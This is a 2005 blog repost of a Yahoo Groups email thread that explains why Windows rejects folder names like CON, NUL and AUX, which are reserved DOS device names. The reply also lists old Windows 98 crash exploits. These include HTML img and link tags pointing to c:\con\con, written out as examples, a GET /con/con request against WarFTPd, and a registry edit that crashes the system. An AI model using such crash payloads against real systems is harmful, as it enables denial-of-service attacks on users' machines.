Thursday, October 13, 2005

Re: [itsdifferent] Simple but strange.................

Hi Subhash
 
FYI
 
Try to rename or create a folder using any of the following names...
Aux
Nul
Con

Surprised....????

wanna ...find out watz d reason behind this.....Den frendzz

Chek out here-----

Explanation:
Device drivers are specified in IO.SYS and date back from the early MS Dos days. Here is a brief list:

CLOCK$          - System clock
CON                - Console; combination of keyboard and screen to handle input and output
AUX or COM1 - First serial communication port
COMn             - Second, Third, ... communication port
LPT1 or PRN  - First parallel port
NUL                - Dummy port, or the "null device" which we all know under Linux as /dev/null.
CONFIG$        - Unknown

 
NUL, AUX, CON, COM1-4, LPT1-3, and PRN are reserved words used for DOS Devices.

 

Besides this:
1. Embedding image tags in HTML pages, with an image path referring to [drive]:\con\con or [drive]:\nul\nul. This will crash Windows 98 when viewing this HTML (tested on Microsoft Outlook and Eudora Pro 4.2 - Netscape Messenger to be invulnerable to this exploit).
Example:
<HTML>
<XBODY>< span>
<A HREF=http://mail.yahoo.com/config/login?/"c:\con\con">crashing IE</A>
<!-- or nul\nul, clock$\clock$ -->
<!-- or aux\aux, config$\config$ -->
</XBODY>< span>
</HTML>


2 . Using GET /con/con or GET /nul/nul under WarFTPd on the root directory will also crash the operating system. Other FTP daemons have not been tested. This allows the remote exploitation of this vulnerability.

3. Modifying [HKEY_LOCAL_MACHINE\Software\CLASSES\exefile\shell\open] to the value:
c:\con\con "%1" %* or c:\nul\nul "%1" %* will crash the system.

4. Creating a HTML page with IMG tags or HREF tags referring to the local "nul" path or the "con" path will crash the system when viewing the HTML file.
Example:
<HTML>
<XBODY>< span>
<IMG SRC="c:\con\con">
<!-- or nul\nul, clock$\clock$ -->
<!-- or aux\aux, config$\config$ -->
</XBODY>< span>
</HTML>  

Regards,
Hetal Rajput

 
On 10/10/05, Subhash <subhashkasundra@gmail.com> wrote:
I found this in Windows..............
 
Try to create folder with name "CON" .........................
 
It will not allow to create such folder.............Why I don't know.............


Note: This Group is not a Job Searching Group, so please co-operate and dont transfer any kind of job related material across this Group.AnyOne doing so can be banned from the Group
Thanx , Group Co-Ordinators




SPONSORED LINKS
Computer software spy Automotive computer software Medical computer software
Computer telephony software Computer software online training Computer monitoring software


YAHOO! GROUPS LINKS






Note: This Group is not a Job Searching Group, so please co-operate and dont transfer any kind of job related material across this Group.AnyOne doing so can be banned from the Group
Thanx , Group Co-Ordinators




YAHOO! GROUPS LINKS




No comments: